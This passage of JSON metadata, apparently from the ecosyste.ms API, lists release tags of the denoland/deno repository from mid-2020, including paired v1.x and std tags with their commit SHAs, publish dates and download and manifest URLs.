deno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed